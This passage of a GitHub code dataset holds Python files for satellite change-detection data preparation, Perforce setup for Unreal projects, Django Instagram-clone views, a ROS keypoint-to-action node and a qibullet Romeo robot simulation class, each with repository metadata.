archive_name):\n print(f\"Copying the archive file '{archive_name}' from Google Drive to local folder...\")\n copy_file(os.path.join(drive_path, archive_name), os.path.join(local_path, archive_name))\n print(\"Archive file copied successfully.\")\n\n print(f\"Unzipping the archive file '{archive_name}'...\")\n unzip_file(os.path.join(local_path, archive_name), local_path)\n print(\"Archive file unzipped successfully.\")\n\ndef load_and_prepare_oscd(local_path=\"/content/datasets\", drive_path=\"/content/drive/MyDrive/2023_dissertation/dataset_archives/\"):\n if os.path.exists(os.path.join(local_path, \"OSCD\")):\n print(\"An 'OSCD' folder already exists in the local path. Skipping dataset loading and preparation.\")\n return\n \n create_folder_if_not_exists(local_path)\n\n OSCD = \"OSCD_Daudt_2018_full.zip\"\n copy_and_unzip(local_path, drive_path, OSCD)\n\n print(\"Moving the extracted folders and renaming if necessary...\")\n move_folder(os.path.join(local_path, \"Onera\"), os.path.join(local_path, \"OSCD\"))\n print(\"Main folder renamed successfully.\")\n\n # Define the folder mappings\n folder_mappings = {\n \"images\": \"Onera Satellite Change Detection dataset - Images\",\n \"train_labels\": \"Onera Satellite Change Detection dataset - Train Labels\",\n \"test_labels\": \"Onera Satellite Change Detection dataset - Test Labels\"\n }\n\n # Move and rename the extracted folders\n oscd_path = os.path.join(local_path, \"OSCD\")\n for source_folder, destination_folder in folder_mappings.items():\n source_path = os.path.join(oscd_path, source_folder)\n destination_path = os.path.join(oscd_path, destination_folder)\n print(f\"Renaming folder '{source_folder}' to '{destination_folder}'...\")\n move_folder(source_path, destination_path)\n print(f\"Folder '{source_folder}' renamed successfully to '{destination_folder}'.\")\n \n print(\"Dataset loading and preparation complete.\")\n\ndef load_and_prepare_omcd(local_path=\"/content/datasets\", drive_path=\"/content/drive/MyDrive/2023_dissertation/dataset_archives/\"):\n if os.path.exists(os.path.join(local_path, \"OMCD\")):\n print(\"An 'OMCD' folder already exists in the local path. 
Skipping dataset loading and preparation.\")\n return\n\n create_folder_if_not_exists(local_path)\n\n OMCD = \"OMCD_Li_2023.zip\"\n copy_and_unzip(local_path, drive_path, OMCD)\n\n print(\"Moving the extracted folders and renaming to OMCD...\")\n move_folder(os.path.join(local_path, \"open-pit mine change detection dataset\"), os.path.join(local_path, \"OMCD\"))\n print(\"Main folder renamed successfully.\")\n\n print(\"Dataset loading and preparation complete.\")\n\ndef crop_sample(dataset, index: int, size: int = 256):\n from torchvision.transforms import CenterCrop\n\n sample = dataset[index]\n cropper = CenterCrop(size)\n\n sample['image'] = cropper(sample['image'])\n sample['mask'] = cropper(sample['mask'])\n\n return sample\n\ndef normalize_sample(sample, mean, std):\n image = sample['image'].float()\n if len(image.shape) < 4:\n image = image.unsqueeze(0)\n normalize = K.Normalize(mean, std)\n normalized_image = normalize(image)\n sample['image'] = normalized_image\n return sample\n\ndef get_oscd_norm_coefficients(bands=\"rgb\"):\n # mean = OSCDDataModule.mean\n # std = OSCDDataModule.std\n mean = torch.tensor([1571.1372, 1365.5087, 1284.8223, 1298.9539, 1431.2260, 1860.9531,\n 2081.9634, 1994.7665, 2214.5986, 641.4485, 14.3672, 1957.3165,\n 1419.6107])\n std = torch.tensor([274.9591, 414.6901, 537.6539, 765.5303, 724.2261, 760.2133,\n 848.7888, 866.8081, 920.1696, 322.1572, 8.6878, 1019.1249,\n 872.1970])\n if bands == \"rgb\":\n mean = mean[[3, 2, 1]]\n std = std[[3, 2, 1]]\n\n mean = torch.cat([mean, mean], dim=0)\n std = torch.cat([std, std], dim=0)\n return mean, std\n\ndef get_omcd_norm_coefficients():\n # mean = OSCDDataModule.mean\n # std = OSCDDataModule.std\n mean = torch.tensor([121.7963, 123.6833, 116.5527])\n std = torch.tensor([67.2949, 68.0268, 65.1758])\n\n mean = torch.cat([mean, mean], dim=0)\n std = torch.cat([std, std], dim=0)\n return mean, std", "repo_name": "Dibz15/OpenMineChangeDetection", "sub_path": "datasets/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5080, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 21, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": 
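get_oscd_norm_coefficients above duplicates the per-band statistics so they cover a stacked bi-temporal image, and normalize_sample applies them through Kornia. The equivalent arithmetic in plain torch, with a random tile standing in for real data:

import torch

mean = torch.tensor([1571.1372, 1365.5087, 1284.8223])   # first three OSCD bands
std = torch.tensor([274.9591, 414.6901, 537.6539])

# Duplicating the statistics matches a 6-channel stack of two 3-band images.
mean2, std2 = torch.cat([mean, mean]), torch.cat([std, std])

image = torch.rand(1, 6, 32, 32) * 2000                   # stand-in bi-temporal tile
normalized = (image - mean2[None, :, None, None]) / std2[None, :, None, None]
print(normalized.shape)                                   # torch.Size([1, 6, 32, 32])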
"os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 91, "usage_type": "call"}, {"api_name": "kornia.augmentation.Normalize", "line_number": 102, "usage_type": "call"}, {"api_name": "kornia.augmentation", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "20643986741", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\n\nimport argparse\nimport socket\nimport subprocess\n\ndefault_ue_p4ignore = [\n \"Saved/\",\n \"LocalBuilds/\",\n \"**.csproj.**\",\n \".vs/**\",\n \"**.pdb\",\n \"**.suo\",\n \"**.opensdf\",\n \"*.sdf\",\n \"**.tmp\",\n \"**.mdb\",\n \"obj/\",\n \"**.vcxproj\",\n \"**.sln\",\n \"**-Debug.*\",\n \"FileOpenOrder/\",\n \"**.xcworkspace\",\n \"**.xcodeproj\",\n \"./Makefile\",\n \"./CMakeLists.txt\",\n \".ue4dependencies\",\n \"Samples/**\",\n \"FeaturePacks/*\",\n \"Templates/*\",\n \"Engine/Documentation/*\",\n \"\\n# Engine intermediates\",\n \"Engine/Intermediate/*\",\n \"Intermediate/\",\n \"\\n# Intermediate folders for programs should not be checked in\",\n r\"Engine\\Programs\\*\\Intermediate\\*\",\n \"\\n# Intermediate folders created for various C# programs\",\n r\"Engine\\Source\\Programs\\*\\obj\\*\",\n \"\\n# Saved folders for programs should not be checked in\",\n r\"Engine\\Programs\\*\\Saved\\*\",\n r\"Engine\\Programs\\UnrealBuildTool\\*\",\n \"\\n# Derived data cache should never be checked in\",\n \"Engine/DerivedDataCache/*\",\n \"\\n# Ignore any build receipts\",\n \"Engine/Build/Receipts/*\",\n \"\\n# Ignore personal workspace vars\",\n \".p4config\",\n \"\\n# Ignore Unix backup files\",\n \"*~\",\n \"\\n# Ignore Mac desktop services store files\",\n \".DS_Store\",\n \"\\n# Ignore crash reports\",\n \"crashinfo--*\",\n \"\\n# Ignore linux project files\",\n \"**.user\",\n \"**.pro\",\n \"**.pri\",\n \"**.kdev4\",\n \"\\n# Obj-C/Swift specific\",\n \"**.hmap\",\n \"**.ipa\",\n \"**.dSYM.zip\",\n \"**.dSYM\",\n \"\\n# Ignore documentation generated for C# tools\",\n \"Engine/Binaries/DotNET/UnrealBuildTool.xml\",\n \"Engine/Binaries/DotNET/AutomationScripts/BuildGraph.Automation.xml\",\n \"\\n# Ignore version files in the Engine/Binaries directory created by UBT\",\n \"/Engine/Binaries/**.version\",\n \"\\n# Ignore exp files in the the Engine/Binaries directory as they aren't C/C++ source files\",\n \"/Engine/Binaries/**.exp\",\n \"\\n# Ignore Swarm local save files\",\n \"Engine/Binaries/DotNET/SwarmAgent.DeveloperOptions.xml\",\n 
\"Engine/Binaries/DotNET/SwarmAgent.Options.xml\",\n \"\\n# Intermediary Files\",\n \"**.target.xml\",\n \"**.exe.config\",\n \"**.exe.manifest\",\n \"\\n# Ignore project-specific files\",\n \"GAMEPROJECT/Build/Receipts/**\",\n \"GAMEPROJECT/DerivedDataCache/**\",\n \"GAMEPROJECT/Binaries/*-Shipping.*\",\n \"GAMEPROJECT/Intermediate/**\",\n \"GAMEPROJECT/Saved/**\",\n]\n\ndefault_ue_typemap = [\n \"# Perforce File Type Mapping Specifications.\",\n \"#\",\n \"# TypeMap: a list of filetype mappings; one per line.\",\n \"# Each line has two elements:\",\n \"#\",\n \"# Filetype: The filetype to use on 'p4 add'.\",\n \"#\",\n \"# Path: File pattern which will use this filetype.\",\n \"#\",\n \"# See 'p4 help typemap' for more information.\",\n \"\",\n \"TypeMap:\",\n \" binary+S2w //depot/....exe\",\n \" binary+S2w //depot/....dll\",\n \" binary+S2w //depot/....lib\",\n \" binary+S2w //depot/....app\",\n \" binary+S2w //depot/....dylib\",\n \" binary+S2w //depot/....stub\",\n \" binary+S2w //depot/....ipa\",\n \" binary //depot/....bmp\",\n \" binary //depot/....png\",\n \" binary //depot/....tga\",\n \" binary //depot/....raw\",\n \" binary //depot/....r16\",\n \" binary //depot/....mb\",\n \" binary //depot/....fbx\",\n \" text //depot/....ini\",\n \" text //depot/....config\",\n \" text //depot/....cpp\",\n \" text //depot/....h\",\n \" text //depot/....c\",\n \" text //depot/....cs\",\n \" text //depot/....m\",\n \" text //depot/....mm\",\n \" text //depot/....py\",\n \" binary+l //depot/....uasset\",\n \" binary+l //depot/....umap\",\n \" binary+l //depot/....upk\",\n \" binary+l //depot/....udk\",\n]\n\n\ndef export_p4_config(ws_root, port, ws, user):\n config_filename = \".p4config\"\n ignore_filename = \".p4ignore\"\n config_filepath = os.path.join(ws_root, config_filename)\n lines = [\n \"P4PORT={}\\n\".format(port),\n \"P4CLIENT={}\\n\".format(ws),\n \"P4USER={}\\n\".format(user),\n \"P4HOST={}\\n\".format(socket.gethostname()),\n \"P4IGNORE={}\\n\".format(ignore_filename),\n ]\n\n if os.path.exists(config_filepath):\n print(\".p4config already exists\")\n return\n\n with open(config_filepath, \"w\") as config_buffer:\n config_buffer.writelines(lines)\n print(\"p4config written to\", config_filepath)\n\n\ndef export_p4_ignore(ws_root, ue_project_name):\n ignore_filename = \".p4ignore\"\n ignore_filepath = os.path.join(ws_root, ignore_filename)\n lines = [\n _.replace(\"GAMEPROJECT\", ue_project_name) + \"\\n\" for _ in default_ue_p4ignore\n ]\n\n if os.path.exists(ignore_filepath):\n print(\".p4ignore already exists\")\n return\n\n with open(ignore_filepath, \"w\") as ignore_buffer:\n ignore_buffer.writelines(lines)\n\n print(\"p4ignore written to\", ignore_filepath)\n\n\ndef get_stream_name(ws_root):\n p = subprocess.Popen(\n [\"p4\", \"-F\", '\"%Stream%\"', \"-ztag\", \"client\", \"-o\"],\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=ws_root,\n )\n\n stream_stdout = p.communicate()[0]\n stream = stream_stdout.decode().replace(\"\\r\\n\", \"\").replace('\"', \"\")\n\n return stream\n\n\ndef setup_p4_typemap(ws_root):\n stream_name = get_stream_name(ws_root)\n depot_name = [_ for _ in stream_name.split(\"/\") if _][0]\n typemap_string = \"\\n\".join(\n [_.replace(\"depot\", depot_name) for _ in default_ue_typemap]\n )\n p = subprocess.Popen(\n [\"p4\", \"typemap\", \"-i\"],\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=ws_root,\n )\n typemap_stdout = p.communicate(input=typemap_string.encode(\"utf-8\"))[0]\n 
print(typemap_stdout.decode())\n\n\ndef setup_for_unreal(ws_root, port, ws, user, ue_project_name):\n    export_p4_config(ws_root, port, ws, user)\n    export_p4_ignore(ws_root, ue_project_name)\n    setup_p4_typemap(ws_root)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"ws_root\")\n    parser.add_argument(\"port\")\n    parser.add_argument(\"ws\")\n    parser.add_argument(\"user\")\n    parser.add_argument(\"ue_project_name\")\n\n    parsed_args = parser.parse_args()\n\n    setup_for_unreal(\n        parsed_args.ws_root,\n        parsed_args.port,\n        parsed_args.ws,\n        parsed_args.user,\n        parsed_args.ue_project_name,\n    )\n", "repo_name": "rmaffesoli/p4v_custom_tools", "sub_path": "setup_for_unreal.py", "file_name": "setup_for_unreal.py", "file_ext": "py", "file_size_in_byte": 6680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 171, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 173, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 174, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 175, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 191, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 193, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 194, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 195, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 209, "usage_type": "call"}]}
+{"seq_id": "12432097221", "text": "from django.shortcuts import render,redirect\nfrom .models import Image,User,Profile\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostForm\nfrom django.http import HttpResponse,Http404,HttpResponseRedirect\n\n\n\n# Create your views here.\n@login_required(login_url='/accounts/login/') \ndef home(request):\n    posts=Image.show_images()\n    return render(request,'ig/home.html',{'posts':posts})\n@login_required\ndef search_profile(request):\n    if 'profile' in request.GET and request.GET[\"profile\"]:\n        search_term=request.GET.get(\"profile\")\n        results_profiles=Image.search_profile(search_term)\n        message=f\"{search_term}\"\n        return render(request,'ig/search.html',{'message':message,'profiles':results_profiles})\n\n    else:\n        message='You have not searched for anything'\n        return render(request,'ig/search.html',{'message':message})\n@login_required\ndef new_post(request):\n    current_user = request.user\n\n    if request.method == \"POST\":\n        form = PostForm(request.POST,request.FILES)\n\n        if form.is_valid():\n            post = form.save(commit=False)\n            post.user = current_user\n            post.save()\n            return redirect(\"home\")\n\n    else:\n        form = PostForm()\n\n    return render(request, 
\"ig/new_post.html\", context={\"form\":form})\n@login_required\ndef profile(request, id):\n user = User.objects.get(id=id)\n profile = Profile.objects.get(id=id)\n posts = Post.objects.filter(profile__id=id)[::-1]\n return render(request, \"ig/profile.html\", context={\"user\":user,\"profile\":profile,\"posts\":posts})", "repo_name": "trevor-ngugi/instagram-clone", "sub_path": "gram/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1600, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Image.show_images", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Image.search_profile", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Image", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 14, "usage_type": "name"}, {"api_name": "forms.PostForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 36, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 25, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 44, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 44, "usage_type": "name"}, {"api_name": "models.Profile.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Profile.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 45, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "39844722363", "text": "#!/usr/bin/env python\nimport sys\nimport rospy\nfrom keypoint_3d_matching_msgs.msg import Keypoint3d_list\nfrom collaborative_games.msg import action_msg\nimport yaml\n\n\ndef get_config(config_file='config_keypoints.yaml'):\n try:\n with open(config_file) as file:\n yaml_data = yaml.safe_load(file)\n except Exception as e:\n print('Error reading the config file')\n\n return yaml_data\n\n\nclass HumanAction:\n\n def __init__(self, config=\"config_keypoints.yaml\"):\n self.config = get_config(\"../../maze3D_game/\" + config)\n topic_to_listen_to = self.config['topic_to_listen_to']\n self.keypoint_sub = rospy.Subscriber(topic_to_listen_to, Keypoint3d_list, self.callback)\n topic_to_publish_on = self.config['topic_to_publish_on']\n self.action_human_pub = rospy.Publisher(topic_to_publish_on, action_msg, queue_size=1)\n self.prev_x = None\n self.start_time = None\n\n def callback(self, pos_x):\n\n # get the header from the received message\n h = pos_x.keypoints[0].points.header\n # get the keypoint of wrist\n pos_x = pos_x.keypoints[0].points.point.x\n\n # set the 
starting point of the wrist\n starting_point = self.config['start_keypoint']\n offset = self.config['offset']\n \"\"\"\n s: starting point\n o/2: offset/2\n ================================================\n -1 | 0 | 1 \n ================================================\n LEFT | CENTER | RIGHT \n ------------------------------------------------\n ||<---offset--->| | ||\n || | s | ||\n || <-o/2->|<-o/2-><-o/2->|<-o/2-> ||\n ------------------------------------------------\n \"\"\"\n if pos_x < starting_point - (offset / 2):\n action = -1\n elif pos_x > starting_point + (offset / 2):\n action = 1\n else:\n action = 0\n\n act = action_msg()\n act.action = action\n act.header = h\n self.action_human_pub.publish(act)\n return action\n\n\nif __name__ == '__main__':\n rospy.init_node('keypoint_to_action', anonymous=True)\n action_listener = HumanAction() # take first argument\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n", "repo_name": "ligerfotis/collaborative_games", "sub_path": "src/human_action/3d_keypoints/keypoint_to_discrete_action.py", "file_name": "keypoint_to_discrete_action.py", "file_ext": "py", "file_size_in_byte": 2434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.safe_load", "line_number": 12, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 24, "usage_type": "call"}, {"api_name": "keypoint_3d_matching_msgs.msg.Keypoint3d_list", "line_number": 24, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 26, "usage_type": "call"}, {"api_name": "collaborative_games.msg.action_msg", "line_number": 26, "usage_type": "argument"}, {"api_name": "collaborative_games.msg.action_msg", "line_number": 60, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 68, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "36565429620", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport pybullet\nimport qibullet.tools as tools\nfrom qibullet.imu import Imu\nfrom qibullet.camera import CameraRgb\nfrom qibullet.camera import CameraDepth\nfrom qibullet.robot_posture import RomeoPosture\nfrom qibullet.robot_virtual import RobotVirtual\n\n\nclass RomeoVirtual(RobotVirtual):\n \"\"\"\n Class representing the virtual instance of the Romeo robot\n \"\"\"\n ID_CAMERA_RIGHT = 0\n ID_CAMERA_LEFT = 1\n ID_CAMERA_DEPTH = 2\n FRAME_WORLD = 1\n FRAME_ROBOT = 2\n URDF_FILE = \"/romeo.urdf\"\n P_STAND = RomeoPosture(\"Stand\")\n P_STAND_INIT = RomeoPosture(\"StandInit\")\n P_STAND_ZERO = RomeoPosture(\"StandZero\")\n P_CROUCH = RomeoPosture(\"Crouch\")\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n # Install the robot meshes and URDFs if they are not already installed.\n # The installation process won't be covered by the unit tests\n if not tools._check_resources_installed(): # pragma: no cover\n tools._install_resources()\n\n # Specify the URDF path\n RobotVirtual.__init__(\n self,\n tools._get_resources_folder() + RomeoVirtual.URDF_FILE)\n\n self.camera_right = None\n self.camera_left = None\n self.camera_depth = None\n\n def loadRobot(self, translation, quaternion, physicsClientId=0):\n \"\"\"\n Overloads @loadRobot from the @RobotVirtual class, loads the robot into\n the simulated instance. 
This method also updates the max velocity of\n        the robot's fingers, adds self collision filters to the model and\n        defines the cameras of the model in the camera_dict.\n\n        Parameters:\n            translation - List containing 3 elements, the translation [x, y, z]\n            of the robot in the WORLD frame\n            quaternion - List containing 4 elements, the quaternion\n            [x, y, z, q] of the robot in the WORLD frame\n            physicsClientId - The id of the simulated instance in which the\n            robot is supposed to be loaded\n        \"\"\"\n        pybullet.setAdditionalSearchPath(\n            os.path.dirname(os.path.realpath(__file__)),\n            physicsClientId=physicsClientId)\n\n        # Add 1.05 meters on the z component, avoiding spawning the robot in the ground\n        translation = [translation[0], translation[1], translation[2] + 1.05]\n\n        RobotVirtual.loadRobot(\n            self,\n            translation,\n            quaternion,\n            physicsClientId=physicsClientId)\n\n        balance_constraint = pybullet.createConstraint(\n            parentBodyUniqueId=self.robot_model,\n            parentLinkIndex=-1,\n            childBodyUniqueId=-1,\n            childLinkIndex=-1,\n            jointType=pybullet.JOINT_FIXED,\n            jointAxis=[0, 0, 0],\n            parentFramePosition=[0, 0, 0],\n            parentFrameOrientation=[0, 0, 0, 1],\n            childFramePosition=translation,\n            childFrameOrientation=quaternion,\n            physicsClientId=self.physics_client)\n\n        self.goToPosture(\"Stand\", 1.0)\n\n        pybullet.setCollisionFilterPair(\n            self.robot_model,\n            self.robot_model,\n            self.link_dict[\"REye\"].getIndex(),\n            self.link_dict[\"LEye\"].getIndex(),\n            0,\n            physicsClientId=self.physics_client)\n\n        for link in [\"torso\", \"HeadRoll_link\"]:\n            pybullet.setCollisionFilterPair(\n                self.robot_model,\n                self.robot_model,\n                self.link_dict[\"NeckPitch_link\"].getIndex(),\n                self.link_dict[link].getIndex(),\n                0,\n                physicsClientId=self.physics_client)\n\n        for side in [\"R\", \"L\"]:\n            pybullet.setCollisionFilterPair(\n                self.robot_model,\n                self.robot_model,\n                self.link_dict[side + \"Eye\"].getIndex(),\n                self.link_dict[\"HeadRoll_link\"].getIndex(),\n                0,\n                physicsClientId=self.physics_client)\n            pybullet.setCollisionFilterPair(\n                self.robot_model,\n                self.robot_model,\n                self.link_dict[side + \"Thigh\"].getIndex(),\n                self.link_dict[\"body\"].getIndex(),\n                0,\n                physicsClientId=self.physics_client)\n            pybullet.setCollisionFilterPair(\n                self.robot_model,\n                self.robot_model,\n                self.link_dict[side.lower() + \"_ankle\"].getIndex(),\n                self.link_dict[side + \"Tibia\"].getIndex(),\n                0,\n                physicsClientId=self.physics_client)\n            pybullet.setCollisionFilterPair(\n                self.robot_model,\n                self.robot_model,\n                self.link_dict[side + \"ShoulderYaw_link\"].getIndex(),\n                self.link_dict[\"torso\"].getIndex(),\n                0,\n                physicsClientId=self.physics_client)\n            pybullet.setCollisionFilterPair(\n                self.robot_model,\n                self.robot_model,\n                self.link_dict[side + \"WristRoll_link\"].getIndex(),\n                self.link_dict[side.lower() + \"_wrist\"].getIndex(),\n                0,\n                physicsClientId=self.physics_client)\n\n            for link in [\"ShoulderYaw_link\", \"WristYaw_link\"]:\n                pybullet.setCollisionFilterPair(\n                    self.robot_model,\n                    self.robot_model,\n                    self.link_dict[side + link].getIndex(),\n                    self.link_dict[side + \"Elbow\"].getIndex(),\n                    0,\n                    physicsClientId=self.physics_client)\n\n            for name, link in self.link_dict.items():\n                if side + \"Finger\" in name or\\\n                   side + \"Thumb\" in name:\n                    pybullet.setCollisionFilterPair(\n                        self.robot_model,\n                        self.robot_model,\n                        self.link_dict[side.lower() + \"_wrist\"].getIndex(),\n                        link.getIndex(),\n                        0,\n                        physicsClientId=self.physics_client)\n\n        for joint in self.joint_dict.values():\n            pybullet.resetJointState(\n                self.robot_model,\n                joint.getIndex(),\n                
0.0,\n physicsClientId=self.physics_client)\n\n pybullet.removeConstraint(\n balance_constraint,\n physicsClientId=self.physics_client)\n\n for joint_name in list(self.joint_dict):\n if 'RFinger' in joint_name or 'RThumb' in joint_name:\n self.joint_dict[joint_name].setMaxVelocity(\n self.joint_dict[\"RHand\"].getMaxVelocity())\n elif 'LFinger' in joint_name or 'LThumb' in joint_name:\n self.joint_dict[joint_name].setMaxVelocity(\n self.joint_dict[\"LHand\"].getMaxVelocity())\n\n camera_right = CameraRgb(\n self.robot_model,\n RomeoVirtual.ID_CAMERA_RIGHT,\n self.link_dict[\"CameraRightEye_optical_frame\"],\n hfov=60.9,\n vfov=47.6,\n physicsClientId=self.physics_client)\n\n camera_left = CameraRgb(\n self.robot_model,\n RomeoVirtual.ID_CAMERA_LEFT,\n self.link_dict[\"CameraLeftEye_optical_frame\"],\n hfov=60.9,\n vfov=47.6,\n physicsClientId=self.physics_client)\n\n camera_depth = CameraDepth(\n self.robot_model,\n RomeoVirtual.ID_CAMERA_DEPTH,\n self.link_dict[\"CameraDepth_optical_frame\"],\n hfov=58.0,\n vfov=45.0,\n physicsClientId=self.physics_client)\n\n self.camera_dict = {\n RomeoVirtual.ID_CAMERA_RIGHT: camera_right,\n RomeoVirtual.ID_CAMERA_LEFT: camera_left,\n RomeoVirtual.ID_CAMERA_DEPTH: camera_depth}\n\n # The frequency of the IMU is set to 100Hz\n self.imu = Imu(\n self.robot_model,\n self.link_dict[\"torso\"],\n 100.0,\n physicsClientId=self.physics_client)\n\n def setAngles(self, joint_names, joint_values, percentage_speed):\n \"\"\"\n Overloads @setAngles from the @RobotVirtual class. Handles the finger\n mimic behaviour.\n\n Parameters:\n joint_names - List of string (or string if only one joint)\n containing the name of the joints to be controlled\n joint_values - List of values (or value if only one joint)\n corresponding to the angles in radians to be applied\n percentage_speed - Percentages of the max speed to be used for\n each joint, has to be strictly superior to 0 and inferior or equal\n to 1\n \"\"\"\n try:\n if type(joint_names) is str:\n assert type(joint_values) is int or type(joint_values) is float\n names = [joint_names]\n values = [joint_values]\n else:\n assert type(joint_names) is type(joint_values) is list\n names = list(joint_names)\n values = list(joint_values)\n\n if isinstance(percentage_speed, list):\n speeds = list(percentage_speed)\n else:\n speeds = [percentage_speed]*len(names)\n\n except AssertionError:\n raise pybullet.error(\"Error in the parameters given to the\\\n setAngles method\")\n\n for hand in [\"RHand\", \"LHand\"]:\n for i in range(names.count(hand)):\n index = names.index(hand)\n value = values[index]\n speed = speeds[index]\n names.pop(index)\n values.pop(index)\n speeds.pop(index)\n finger_names, finger_values = self._mimicHand(hand, value)\n names.extend(finger_names)\n values.extend(finger_values)\n speeds.extend([speed]*len(finger_names))\n\n RobotVirtual.setAngles(\n self,\n names,\n values,\n speeds)\n\n def getAnglesPosition(self, joint_names):\n \"\"\"\n Overloads @getAnglesPosition from the @RobotVirtual class. 
